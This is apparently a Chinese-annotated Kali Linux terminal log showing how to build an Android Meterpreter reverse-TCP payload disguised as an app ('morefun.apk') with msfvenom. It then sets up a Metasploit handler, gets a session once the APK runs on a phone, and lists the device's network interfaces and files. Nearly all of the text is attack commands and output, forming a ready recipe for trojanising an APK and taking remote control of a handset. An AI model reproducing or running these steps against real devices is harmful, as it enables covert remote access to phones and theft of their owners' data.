root@kali:~# msfvenom -pandroid/meterpreter/reverse_tcp lhost=192.168.1.117 -o /root/morefun.apk

No platform was selected, choosingMsf::Module::Platform::Android from the payload

No Arch selected, selecting Arch: dalvikfrom the payload

No encoder or badchars specified,outputting raw payload

Payload size: 9486 bytes

Saved as: /root/morefun.apk            (病毒)

 

root@kali:~# msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > set payloadandroid/meterpreter/reverse_tcp

msf exploit(handler) > set lhost192.168.1.117                            (kali linux主机)

msf exploit(handler) > show options

 

Module options (exploit/multi/handler):

 

  Name  Current Setting  Required Description

  ----  ---------------  -------- -----------

 

 

Payload options(android/meterpreter/reverse_tcp):

 

  Name             CurrentSetting  Required  Description

  ----            ---------------  --------  -----------

  AutoLoadAndroid  true             yes       Automatically load the Android extension

  LHOST                            yes       The listen address

  LPORT            4444             yes       The listen port

 

 

Exploit target:

 

  Id  Name

  --  ----

  0   Wildcard Target

 

msf exploit(handler) > exploit -j z

[*] Exploit running as background job.

 

[*] Started reverse TCP handler on192.168.1.117:4444

[*] Starting the payload handler...

开始监听

msf exploit(handler) > [*] Sending stage(63194 bytes) to 192.168.1.224

[*] Meterpreter session 1 opened(192.168.1.117:4444 -> 192.168.1.224:60942) at 2017-03-09 01:11:31-0500          (android手机上安装morefun.apk运行后产生session 1)

 

msf exploit(handler) > sessions

 

Active sessions

===============

 

 Id  Type                      Information          Connection

 --  ----                      -----------          ----------

 3   meterpreter java/android  u0_a508 @ localhost  192.168.1.117:4444 -> 192.168.1.224:49711(192.168.1.224)

 

msf exploit(handler) > sessions -i 3                (3是session Id号码)

[*] Starting interaction with 3...

 

meterpreter > help                 (你已经能看到该android手机上。。。。。。)

meterpreter > ifconfig

Interface 10

============

Name        : wlan0 - wlan0

Hardware MAC : d0:22:be:a4:7e:11

IPv4 Address : 192.168.1.224

IPv4 Netmask : 255.255.255.0

IPv6 Address : fe80::d222:beff:fea4:7e11

IPv6 Netmask : ::

meterpreter > ps

meterpreter > ls